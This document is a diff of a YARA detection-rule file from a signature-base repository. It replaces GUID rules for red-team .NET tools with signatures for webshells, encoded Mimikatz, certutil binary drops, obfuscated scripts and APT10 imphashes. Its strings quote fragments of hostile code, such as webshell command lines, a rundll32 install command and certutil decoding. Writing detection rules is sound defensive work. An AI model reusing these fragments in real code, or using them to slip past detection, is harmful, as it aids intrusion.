 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4b25128df5cdc26152494f39656546974b3b04c5e4ec7d3084e27d0f6baf4ca0"
-		score = 75
+		hash = "05a3f93dbb6c3705fd5151b6ffb64b53bc555575"
+		logic_hash = "70804d914c6f31422632943bf663f997eb747a290a13b27bfcc66bc3129f136d"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "4885a4a3-4dfa-486c-b378-ae94a221661a" ascii wide
-		$typelibguid0up = "4885A4A3-4DFA-486C-B378-AE94A221661A" ascii wide
+		$s0 = "---> '.$ports[$i].'<br>'; ob_flush(); flush(); } } echo '</div>'; return true; }" ascii
+		$s1 = "$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : ''; $getaction = iss" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Njcrypter : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Rootkit : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c30c8323-9418-521a-a4fc-6be0113b99b5"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/0xPh0enix/njCrypter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L362-L378"
+		description = "Webshell from CN Honker Pentest Toolset - file rootkit.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ab51abca-0790-541c-9f18-1568809ef113"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1066-L1081"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3fafad2f64c931394f9deddc1751da8286d7ba7727c3505fbc20cf8c4226971a"
-		score = 75
+		hash = "3bfc1c95782e702cf56184e7d438edcf5802eab3"
+		logic_hash = "5569a179f011ece9802676542d5556fe8d2a2b144e26065b9e0c5bd06c970201"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "8a87b003-4b43-467b-a509-0c8be05bf5a5" ascii wide
-		$typelibguid0up = "8A87B003-4B43-467B-A509-0C8BE05BF5A5" ascii wide
-		$typelibguid1lo = "80b13bff-24a5-4193-8e51-c62a414060ec" ascii wide
-		$typelibguid1up = "80B13BFF-24A5-4193-8E51-C62A414060EC" ascii wide
+		$s0 = "set ss=zsckm.get(\"Win32_ProcessSta\"&uyy&\"rtup\")" fullword ascii
+		$s1 = "If jzgm=\"\"Then jzgm=\"cmd.exe /c net user\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 80KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpminidump : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Jspshell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e91e6711-d992-5a8a-97e6-1ed7847f38a4"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/b4rtik/SharpMiniDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L380-L394"
+		description = "Webshell from CN Honker Pentest Toolset - file jspshell.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ff72f94b-1c0a-5615-b35f-35f69c920292"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1083-L1098"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ef422dfd066c4fff7e3e72758557bcac81883ae75f0bf0c8efc14a127e12acf"
-		score = 75
+		hash = "d16af622f7688d4e0856a2678c4064d3d120e14b"
+		logic_hash = "9b952f941eb87d7a1b4f747f4e0b0b5ee8876190c6f684b811057a2c78044047"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "6ffccf81-6c3c-4d3f-b15f-35a86d0b497f" ascii wide
-		$typelibguid0up = "6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F" ascii wide
+		$s1 = "else if(Z.equals(\"M\")){String[] c={z1.substring(2),z1.substring(0,2),z2};Proce" ascii
+		$s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Cinarat : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Serv_U : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c6b4c919-0fc6-5096-b29b-963142a2c831"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/wearelegal/CinaRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L396-L412"
+		description = "Webshell from CN Honker Pentest Toolset - file serv-u.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dd37b2c3-e06d-5245-97d7-40e5eeadb76f"
+		date = "2015-06-23"
+		modified = "2023-01-27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1100-L1117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "10b086a6472ebad3bc3ab3fe41fb1869632aa94f4fe44446fa1fa7d97abf3ce6"
-		score = 75
+		hash = "1c6415a247c08a63e3359b06575b36017befc0c0"
+		logic_hash = "89cfcbaa38c3b0b6c31af634b4588dcc8bc7a5aa3edac955a162173341d03622"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "8586f5b1-2ef4-4f35-bd45-c6206fdc0ebc" ascii wide
-		$typelibguid0up = "8586F5B1-2EF4-4F35-BD45-C6206FDC0EBC" ascii wide
-		$typelibguid1lo = "fe184ab5-f153-4179-9bf5-50523987cf1f" ascii wide
-		$typelibguid1up = "FE184AB5-F153-4179-9BF5-50523987CF1F" ascii wide
+		$s1 = "@readfile(\"c:\\\\winnt\\\\system32\\" ascii
+		$s2 = "$sendbuf = \"PASS \".$_POST[\"password\"].\"\\r\\n\";" fullword ascii
+		$s3 = "$cmd=\"cmd /c rundll32.exe $path,install $openPort $activeStr\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 435KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Toxiceye : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Webshell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0b7b62ce-9c24-5d81-8d87-22f6e461a62b"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/LimerBoy/ToxicEye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L414-L428"
+		description = "Webshell from CN Honker Pentest Toolset - file WebShell.cgi"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9fe4c8fd-3955-5405-add2-835e6f64e8f2"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1119-L1135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "29c8be9e1500ff5799e7527482131e28dcea66077958d2c30126415769ad6ee0"
-		score = 75
+		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
+		logic_hash = "7d80390a86b1858d2cf4f2be56df7e734aea402de0878adf40ef36721719ca74"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "1bcfe538-14f4-4beb-9a3f-3f9472794902" ascii wide
-		$typelibguid0up = "1BCFE538-14F4-4BEB-9A3F-3F9472794902" ascii wide
+		$s1 = "$login = crypt($WebShell::Configuration::password, $salt);" fullword ascii
+		$s2 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword ascii
+		$s3 = "warn \"command: '$command'\\n\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 30KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Disable_Windows_Defender : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Mssql_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9a673427-e66e-594b-942a-64a2272319f3"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/Disable-Windows-Defender"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L430-L444"
+		description = "Webshell from CN Honker Pentest Toolset - file mssql.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f9706d6-7f6e-5120-945a-d5d928d79507"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1137-L1153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eeabc349036a73e65f81558e5e447c69a68161d487d0991a808800135287a67c"
-		score = 75
+		hash = "ad55512afa109b205e4b1b7968a89df0cf781dc9"
+		logic_hash = "1d4b75eeeddda6e92b8ec38679d5e2b9d21abf2d2b467b91a066dcf628725f0a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "501e3fdc-575d-492e-90bc-703fb6280ee2" ascii wide
-		$typelibguid0up = "501E3FDC-575D-492E-90BC-703FB6280EE2" ascii wide
+		$s1 = "sqlpass=request(\"sqlpass\")" fullword ascii
+		$s2 = "set file=fso.createtextfile(server.mappath(request(\"filename\")),8,true)" fullword ascii
+		$s3 = "<blockquote> ServerIP:&nbsp;&nbsp;&nbsp;" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvoke_Poc : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f3b0ef47-a92c-5c5d-a9e2-09579fcb438e"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/dtrizna/DInvoke_PoC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L446-L460"
+		description = "Webshell from CN Honker Pentest Toolset - file asp1.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bf0b1f1e-cf7b-5afb-8e0a-bcfd70fc8887"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1155-L1171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c72125f272d18801c36a4f5f8c877ae5ecf3a81bd9e58113ce79f2311c455c65"
-		score = 75
+		hash = "78b5889b363043ed8a60bed939744b4b19503552"
+		logic_hash = "3b454b1254d05b2208aee02e966c9c56a338dd3d33a2c6acc2c4df3208314055"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "5a869ab2-291a-49e6-a1b7-0d0f051bef0e" ascii wide
-		$typelibguid0up = "5A869AB2-291A-49E6-A1B7-0D0F051BEF0E" ascii wide
+		$s1 = "SItEuRl=" ascii
+		$s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
+		$s3 = "Server.ScriptTimeout=" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Reverseshell : FILE
+rule SIGNATURE_BASE_Gen_Base64_EXE : HIGHVOL FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "876932d5-a65d-5230-9cb8-24038ad8af0d"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/chango77747/ReverseShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L462-L478"
+		description = "Detects Base64 encoded Executable in Executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ef919a63-9a29-5624-a084-b92e3578e3a6"
+		date = "2017-04-21"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_cloaking.yar#L71-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b736919d47877bcca21ba0fb136fe2ed39b645f6b1e9e9b5f0f2fc4758814174"
+		logic_hash = "6fe18ee727a836c0baaac4dbbffdb9f50065f56a4c6eeee7e54792a8a66229de"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "980109e4-c988-47f9-b2b3-88d63fababdc" ascii wide
-		$typelibguid0up = "980109E4-C988-47F9-B2B3-88D63FABABDC" ascii wide
-		$typelibguid1lo = "8abe8da1-457e-4933-a40d-0958c8925985" ascii wide
-		$typelibguid1up = "8ABE8DA1-457E-4933-A40D-0958C8925985" ascii wide
+		$s1 = "TVpTAQEAAAAEAAAA//8AALgAAAA" wide ascii
+		$s2 = "TVoAAAAAAAAAAAAAAAAAAAAAAAA" wide ascii
+		$s3 = "TVqAAAEAAAAEABAAAAAAAAAAAAA" wide ascii
+		$s4 = "TVpQAAIAAAAEAA8A//8AALgAAAA" wide ascii
+		$s5 = "TVqQAAMAAAAEAAAA//8AALgAAAA" wide ascii
+		$fp1 = "BAM Management class library"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpc2 : FILE
+rule SIGNATURE_BASE_Binary_Drop_Certutil : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2ed6d74e-2b95-5c70-807a-4da5e62f5853"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/SharpC2/SharpC2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L480-L504"
+		description = "Drop binary as base64 encoded cert trick"
+		author = "Florian Roth (Nextron Systems)"
+		id = "19791e51-d041-524d-80fa-9f3ec54eb084"
+		date = "2015-07-15"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/9DNn8q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_cloaking.yar#L92-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f145c6061a4babb006acb84b3dd16a9fe7ce5819c9a656f0a947119016cf992b"
-		score = 75
+		logic_hash = "3e2b62442b5da6ab887e1eb03cdd44932651fa51ce11e87e6fc29015e708d2f3"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "62b9ee4f-1436-4098-9bc1-dd61b42d8b81" ascii wide
-		$typelibguid0up = "62B9EE4F-1436-4098-9BC1-DD61B42D8B81" ascii wide
-		$typelibguid1lo = "d2f17a91-eb2d-4373-90bf-a26e46c68f76" ascii wide
-		$typelibguid1up = "D2F17A91-EB2D-4373-90BF-A26E46C68F76" ascii wide
-		$typelibguid2lo = "a9db9fcc-7502-42cd-81ec-3cd66f511346" ascii wide
-		$typelibguid2up = "A9DB9FCC-7502-42CD-81EC-3CD66F511346" ascii wide
-		$typelibguid3lo = "ca6cc2ee-75fd-4f00-b687-917fa55a4fae" ascii wide
-		$typelibguid3up = "CA6CC2EE-75FD-4F00-B687-917FA55A4FAE" ascii wide
-		$typelibguid4lo = "a1167b68-446b-4c0c-a8b8-2a7278b67511" ascii wide
-		$typelibguid4up = "A1167B68-446B-4C0C-A8B8-2A7278B67511" ascii wide
-		$typelibguid5lo = "4d8c2a88-1da5-4abe-8995-6606473d7cf1" ascii wide
-		$typelibguid5up = "4D8C2A88-1DA5-4ABE-8995-6606473D7CF1" ascii wide
+		$s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
+		$s1 = "echo -----END CERTIFICATE----- >>" ascii
+		$s2 = "certutil -decode " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sneakyexec : FILE
+rule SIGNATURE_BASE_Stegokatz : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "853b630d-77ba-5847-a129-c9fa0538f81b"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/HackingThings/SneakyExec"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L506-L520"
+		description = "Encoded Mimikatz in other file types"
+		author = "Florian Roth (Nextron Systems)"
+		id = "78868bb0-af69-573d-afd2-350a46f69137"
+		date = "2015-09-11"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/jWPBBY"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_cloaking.yar#L109-L123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a1a88512f8da078f9eb4ece21106b1cb0ba99ad86f5d3f90b036b647bb396fd4"
-		score = 75
+		logic_hash = "091b07220d2a89822aa382edcecf5869d463e375747cc41f52417e66ccf0e2da"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "612590aa-af68-41e6-8ce2-e831f7fe4ccc" ascii wide
-		$typelibguid0up = "612590AA-AF68-41E6-8CE2-E831F7FE4CCC" ascii wide
+		$s1 = "VC92Ny9TSXZMNk5jLy8vOUlqUTFVRlFNQTZMLysvdjlJaTh2L0ZUNXJBUUJJaTFRa1NFaUx6K2hWSS8vL1NJME44bklCQU9pZC92Ny9USTJjSkpBQUFBQXp3RW1MV3hCSmkyc1lTWXR6S0VtTDQxL0R6TXhNaTl4SmlWc0lUWWxMSUUySlF4aFZWbGRCVkVGVlFWWkJWMGlCN1BBQUFBQklnMlFrYUFDNE1BQUFBRW1MNkVTTmNPQ0pSQ1JnaVVRa1pFbU5RN0JKaTlsTWpRWFBGQU1BU0ls" ascii
+		$s2 = "Rpd3ovN3FlalVtNklLQ0xNNGtOV1BiY0VOVHROT0Zud25CWGN0WS9BcEdMR28rK01OWm85Nm9xMlNnY1U5aTgrSTBvNkFob1FOTzRHQWdtUElEVmlqald0Tk90b2FmN01ESWJUQkF5T0pYbTB4bFVHRTBZWEFWOXVoNHBkQnRrS0VFWWVBSEE2TDFzU0c5a2ZFTEc3QWd4WTBYY1l3ZzB6QUFXS09JZE9wQVhEK3lnS3lsR3B5Q1ljR1NJdFNseGZKWUlVVkNFdEZPVjRJUldERUl1QXpKZ2pCQWdsd0Va" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Urbanbishoplocal : FILE
+rule SIGNATURE_BASE_Obfuscated_VBS_April17 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "53b690ec-7d20-5e46-b368-b458ce56073d"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/slyd0g/UrbanBishopLocal"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L522-L536"
+		description = "Detects cloaked Mimikatz in VBS obfuscation"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ca60b885-bb56-55ee-a2b3-dea6958883c2"
+		date = "2017-04-21"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_cloaking.yar#L125-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0102e3ecbc13503858ad2119f206fa052caefdf557bbc62448c6da8c8b540de1"
+		logic_hash = "590dca22a4fcbc2bbfb4358c53f7cb6c06824970139cca251c4cf1bd435817b0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "88b8515e-a0e8-4208-a9a0-34b01d7ba533" ascii wide
-		$typelibguid0up = "88B8515E-A0E8-4208-A9A0-34B01D7BA533" ascii wide
+		$s1 = "::::::ExecuteGlobal unescape(unescape(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshell : FILE
+rule SIGNATURE_BASE_Obfuscated_JS_April17 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5966be44-c010-5c63-9576-1aaf36397d6c"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/cobbr/SharpShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L538-L554"
+		description = "Detects cloaked Mimikatz in JS obfuscation"
+		author = "Florian Roth (Nextron Systems)"
+		id = "44abd2c0-5f8d-5a8c-b282-a09853e12054"
+		date = "2017-04-21"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_cloaking.yar#L139-L153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1a0d81f4bccde400d981da9cf769972fe1b8da44911c0805e6226f1db2ba0e84"
+		logic_hash = "c75bf0ad8dd35fabbaedb54c2630249497edbb215b6ce2b707e32f82e8fb8f56"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "bdba47c5-e823-4404-91d0-7f6561279525" ascii wide
-		$typelibguid0up = "BDBA47C5-E823-4404-91D0-7F6561279525" ascii wide
-		$typelibguid1lo = "b84548dc-d926-4b39-8293-fa0bdef34d49" ascii wide
-		$typelibguid1up = "B84548DC-D926-4B39-8293-FA0BDEF34D49" ascii wide
+		$s1 = "\";function Main(){for(var " ascii
+		$s2 = "=String.fromCharCode(parseInt(" ascii
+		$s3 = "));(new Function(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Evilwmiprovider : FILE
+
+rule SIGNATURE_BASE_APT_APT10_Malware_Imphash_Dec18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3a6cf00e-28c4-5e6f-a28d-b3f28fca6eed"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/sunnyc7/EvilWMIProvider"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L556-L570"
+		description = "Detects APT10 malware based on ImpHashes"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2de195a3-63a4-50ac-a83d-ab0db0f784bf"
+		date = "2018-12-28"
+		modified = "2023-12-05"
+		reference = "AlienVault OTX IOCs - statistical sample analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt10.yar#L1390-L1406"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5999197c1ccc2b3e9043c1cd4f73ef607f46b8eab0cd93889263cc460a3ba2c8"
+		logic_hash = "d6e2f23f3809e7a7064bfe4859db3480454a9c8b21ffac2e1e8b7b8a8906de93"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$typelibguid0lo = "a4020626-f1ec-4012-8b17-a2c8a0204a4b" ascii wide
-		$typelibguid0up = "A4020626-F1EC-4012-8B17-A2C8A0204A4B" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and ( pe.imphash ( ) == "0556ff5e5f8744bff47d4921494ba46d" or pe.imphash ( ) == "cb1194123f68a68eb14552c085b620ce" or pe.imphash ( ) == "efad9ff8c0d2a6419bf1dd970bcd806d" or pe.imphash ( ) == "7a861cd9c495e1d950a43cb708a22985" or pe.imphash ( ) == "a5d0545030be75a421529c2b0be6c4bd" or pe.imphash ( ) == "94491f4a812b0297419dc888aa4fd2a5" )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Gadgettojscript : FILE
+rule SIGNATURE_BASE_APT_Cobaltstrike_Beacon_Indicator : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e296795f-d006-52a9-92c4-fb60c930564b"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/med0x2e/GadgetToJScript"
